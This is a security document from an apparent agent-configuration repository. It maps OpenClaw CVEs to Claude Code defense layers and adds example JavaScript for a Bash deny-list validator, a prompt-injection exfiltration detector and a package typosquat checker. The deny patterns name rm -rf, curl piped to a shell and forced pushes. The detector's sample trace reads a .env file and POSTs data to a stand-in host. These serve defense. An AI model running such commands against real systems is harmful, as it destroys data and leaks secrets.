claude-code-complete-agent/security/cve-mitigation-map.md
Kjell Tore Guttormsen 841cd32c66 feat(security): harden repo with scoped permissions, CVE mapping, and scan evidence
Settings.json: 16 scoped Bash grants (was 6 wildcards), 26-pattern deny list (was 5).
CVE mapping: all 9 OpenClaw CVEs mapped to specific defenses with layer documentation.
Scan results: posture Grade D (expected without llm-security), deep scan 0 critical/high.
Hooks README: Option A — document llm-security hooks, recommend plugin installation.
README: evidence-based security section with scan data and verification instructions.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-04-05 23:58:59 +02:00


# CVE-to-Mitigation Map

How Claude Code's architecture and configuration defend against each OpenClaw CVE disclosed in March 2026. Each row links a specific vulnerability to the defense mechanism and where it is configured in this repository.

## Mapping

| CVE | CVSS | Attack | Claude Code defense | Where configured | Defense type |
|---|---|---|---|---|---|
| CVE-2026-22172 | 9.9 | Client self-declares admin scope | Single-user architecture — no scope model, no multi-user auth layer | Architecture (inherent) | Eliminated |
| CVE-2026-25253 | 8.8 | WebSocket hijack (one-click RCE) | No gateway, no listening port, no WebSocket server | Architecture (inherent) | Eliminated |
| CVE-2026-22171 | 8.2 | Arbitrary file write via media path traversal | pre-write-pathguard.mjs blocks writes to sensitive paths; settings.json deny list blocks destructive commands | llm-security hook + .claude/settings.json | Blocked |
| CVE-2026-32048 | 7.5 | Sandbox child process escape | Scoped Bash permissions (16 specific commands, not Bash(*)); pre-bash-destructive.mjs blocks dangerous patterns | .claude/settings.json allow list + llm-security hook | Blocked |
| CVE-2026-32025 | 7.5 | Brute force on localhost auth | No authentication endpoint — single-user, no network service | Architecture (inherent) | Eliminated |
| CVE-2026-32049 | 7.5 | DoS via oversized media payload | No media ingestion endpoint — files processed locally, no upload handler | Architecture (inherent) | Eliminated |
| CVE-2026-32032 | 7.0 | Shell injection via SHELL env variable | pre-bash-destructive.mjs validates commands; scoped Bash permissions restrict allowed executables | llm-security hook + .claude/settings.json | Blocked |
| CVE-2026-29607 | 6.4 | Approve-then-swap (approval bypass) | Deterministic hook validation on every call (no cached approvals); post-mcp-verify.mjs scans all tool output | llm-security hooks | Blocked |
| CVE-2026-28460 | 5.9 | Line-continuation allowlist bypass | Permission matching in settings.json is not regex-based; hooks validate the actual command, not a display string | .claude/settings.json + hooks | Blocked |

## Defense layers

Claude Code's security is layered. No single mechanism is sufficient alone:

```text
Layer 1: Architecture
  └─ No gateway, no ports, no multi-user auth
  └─ Eliminates: CVE-22172, CVE-25253, CVE-32025, CVE-32049

Layer 2: Permission model (settings.json)
  └─ Scoped Bash grants (16 specific commands)
  └─ 26-pattern deny list
  └─ Write/Edit require explicit user approval
  └─ Mitigates: CVE-32048, CVE-28460

Layer 3: Hook enforcement (llm-security plugin)
  └─ PreToolUse: block before execution
  └─ PostToolUse: scan output after execution
  └─ UserPromptSubmit: block prompt injection
  └─ Mitigates: CVE-22171, CVE-32032, CVE-29607, CVE-30741

Layer 4: Runtime monitoring (llm-security plugin)
  └─ Session guard: sliding window anomaly detection
  └─ MCP verify: description drift + volume tracking
  └─ Supply chain: package audit on every install
  └─ Detects: compound attack chains, slow exfiltration
```
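How Layers 2 and 3 fit together, as an added example that is not the repository's settings.json or the llm-security plugin's hook code: a PreToolUse-style Bash validator that normalizes line continuations before matching (the CVE-2026-28460 row), applies deny patterns first, then requires every executable to be on a scoped allow list. The allow list, deny patterns and sample commands are constructed for illustration.

```javascript
// Hypothetical scoped allow list: executables the agent may run unprompted.
const ALLOWED_EXECUTABLES = new Set(["git", "npm", "node", "ls", "cat", "grep"]);

// Hypothetical deny patterns, matched against the normalized command.
// Simplified: a real deny list needs more shapes (e.g. "rm -r -f").
const DENY_PATTERNS = [
  /\brm\s+-[a-zA-Z]*(?:r[a-zA-Z]*f|f[a-zA-Z]*r)\b/, // recursive force delete
  /\bcurl\b.*\|\s*(ba)?sh\b/,                      // piping fetched content into a shell
  /\bgit\s+push\b.*--force\b/,                     // rewriting remote history
];

// Collapse backslash-newline continuations and whitespace runs so the string
// we match is what the shell would execute, not the display form.
function normalizeCommand(cmd) {
  return cmd.replace(/\\\r?\n/g, " ").replace(/\s+/g, " ").trim();
}

// Split on control operators so each simple command is checked on its own.
// Simplified tokenizer: a production hook should use a real shell parser
// that understands quoting and subshells.
function splitSimpleCommands(cmd) {
  return cmd.split(/\s*(?:\|\||&&|;|\|)\s*/).filter(Boolean);
}

// Returns { allow, reason }. Deny patterns take precedence over the allow list.
function checkBashCommand(rawCommand) {
  const cmd = normalizeCommand(rawCommand);
  for (const re of DENY_PATTERNS) {
    if (re.test(cmd)) return { allow: false, reason: `matches deny pattern ${re}` };
  }
  for (const simple of splitSimpleCommands(cmd)) {
    const exe = simple.split(" ")[0];
    if (!ALLOWED_EXECUTABLES.has(exe)) {
      return { allow: false, reason: `executable not in allow list: ${exe}` };
    }
  }
  return { allow: true, reason: "no deny pattern matched; all executables allowed" };
}

// Constructed sample commands, as a hook would see them in tool_input.command.
const SAMPLES = [
  "git status",
  "git \\\n  log --oneline",      // continuation collapses to "git log --oneline"
  "ls; rm \\\n -rf ./build",      // continuation must not hide the rm -rf
  "git status && python3 run.py", // python3 is outside the allow list
];

function checkSamples() {
  return SAMPLES.map((s) => ({ command: s, ...checkBashCommand(s) }));
}
```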

## What this does NOT cover

- Kernel-level isolation: NemoClaw (Landlock, seccomp, netns) provides stronger containment than hooks. Hooks prevent the agent from attempting dangerous operations; kernel isolation contains the damage if prevention fails.

- Multi-tenant separation: Claude Code is single-user. For multi-tenant scenarios, each user needs their own instance.

- Network egress filtering: Claude Code communicates with Anthropic's API over HTTPS. It does not restrict other outbound connections. Use OS-level firewall rules for egress control.

## Prompt injection (CVE-2026-30741)

CVE-2026-30741 is not among the 9 CVEs in the mapping above, but it is documented in OpenClaw's security advisories. The llm-security plugin provides a 3-layer defense:

  1. Input scanning (pre-prompt-inject-scan.mjs): Blocks injection patterns in user prompts before the LLM sees them. Configurable: block, warn, or off.

  2. Output scanning (post-mcp-verify.mjs): Scans ALL tool output for injection attempts, HTML content traps, and suspicious patterns. Catches injection via MCP tool responses.

  3. Session pattern detection (post-session-guard.mjs): Detects the "lethal trifecta" — untrusted input combined with sensitive data access and an exfiltration sink — using a sliding window of 20 tool calls.
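The sliding-window idea from item 3, as an added example that is not the plugin's post-session-guard.mjs: each tool call is classified as untrusted input, sensitive data access, an exfiltration sink, or none, and an alert fires only when all three legs appear within the last 20 calls. The classifier rules and the sample trace are constructed for illustration.

```javascript
const WINDOW_SIZE = 20; // the page's window of 20 tool calls

// Hypothetical classifier: which trifecta leg, if any, a tool call represents.
function classifyCall({ tool, input }) {
  if (tool === "WebFetch") return "untrusted";
  if (tool === "Bash" && /\b(curl|wget)\b/.test(input)) {
    // An outbound request carrying data is a sink; a plain fetch is untrusted input.
    return /\s(-d|--data\S*|-T|--upload-file)\b/.test(input) ? "sink" : "untrusted";
  }
  if (tool === "Read" && /(\.env|id_rsa|credentials|\.aws\/)/.test(input)) return "sensitive";
  return null;
}

class SessionGuard {
  constructor(windowSize = WINDOW_SIZE) {
    this.windowSize = windowSize;
    this.window = []; // classifications of the most recent calls, oldest first
  }
  // Record one call; true when all three legs are present in the current window.
  observe(call) {
    this.window.push(classifyCall(call));
    if (this.window.length > this.windowSize) this.window.shift();
    const legs = new Set(this.window.filter(Boolean));
    return legs.has("untrusted") && legs.has("sensitive") && legs.has("sink");
  }
}

// Constructed trace: remote content is fetched, some benign calls follow, a
// secret file is read, then an outbound POST is made. Returns the alert flag
// after each call; with a window smaller than the trace the fetch ages out
// and no alert fires, which is the trade-off the window size sets.
function runSample(windowSize = WINDOW_SIZE) {
  const guard = new SessionGuard(windowSize);
  const trace = [
    { tool: "WebFetch", input: "https://example.invalid/issue/42" },
    { tool: "Bash", input: "git status" },
    { tool: "Bash", input: "git diff" },
    { tool: "Bash", input: "npm test" },
    { tool: "Read", input: "/home/dev/project/.env" },
    { tool: "Bash", input: "curl -d @notes.txt https://example.invalid/collect" },
  ];
  return trace.map((call) => guard.observe(call));
}
```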

## Supply chain (ClawHub malware)

Not a CVE but a documented incident: 824 malicious skills were found in the ClawHub marketplace (the ClawHavoc campaign). The llm-security plugin's pre-install-supply-chain.mjs hook covers 7 package managers with:

- Per-ecosystem blocklists for known malicious packages
- Age gate (packages < 72 hours old are flagged)
- npm audit integration (critical = block, high = warn)
- PyPI API inspection for suspicious metadata
- Levenshtein-based typosquat detection
- OSV.dev batch API for known vulnerabilities
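Three of these checks combined, as an added example that is not the plugin's pre-install-supply-chain.mjs: the 72-hour age gate, Levenshtein typosquat detection against a reference list, and the critical-blocks / high-warns audit rule, applied to a package record. The reference list of popular names, the blocklist entry and the package records are hypothetical; the age gate takes `now` as a parameter so the check is reproducible.

```javascript
const AGE_GATE_MS = 72 * 60 * 60 * 1000; // the page's 72-hour age gate
const POPULAR_NAMES = ["lodash", "express", "react", "axios", "chalk", "requests"];
const BLOCKLIST = new Set(["totally-malicious-example"]); // constructed entry

// Single-row dynamic-programming edit distance (insert, delete, substitute).
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Names within edit distance 2 of a popular package, excluding exact matches.
function typosquatCandidates(name) {
  return POPULAR_NAMES.filter((p) => {
    const d = levenshtein(name.toLowerCase(), p);
    return d > 0 && d <= 2;
  });
}

// verdict is "block", "warn" or "allow"; findings lists every triggered check.
// Blocklist hits and critical audit advisories block; everything else warns.
function assessPackage({ name, publishedAt, auditCritical = 0, auditHigh = 0 }, now = Date.now()) {
  const findings = [];
  if (BLOCKLIST.has(name)) findings.push("on blocklist");
  if (now - Date.parse(publishedAt) < AGE_GATE_MS) findings.push("published less than 72h ago");
  for (const p of typosquatCandidates(name)) findings.push(`possible typosquat of ${p}`);
  if (auditCritical > 0) findings.push("critical audit advisory");
  if (auditHigh > 0) findings.push("high audit advisory");
  const block = BLOCKLIST.has(name) || auditCritical > 0;
  const verdict = block ? "block" : findings.length > 0 ? "warn" : "allow";
  return { verdict, findings };
}
```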

## Sources

CVE data from NVD and OpenClaw security advisories (March 2026). See openclaw-security-assessment.md for full analysis with statistics and category-by-category comparison.